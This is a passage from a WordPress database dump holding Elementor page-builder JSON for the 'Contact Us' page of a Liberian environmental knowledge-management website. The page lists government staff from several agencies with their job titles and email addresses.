parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14904,2367,'_elementor_edit_mode','builder'),(14905,2367,'_elementor_template_type','wp-page'),(14906,2367,'_elementor_version','2.7.5'),(14907,2367,'_wp_page_template','default'),(14908,2367,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a 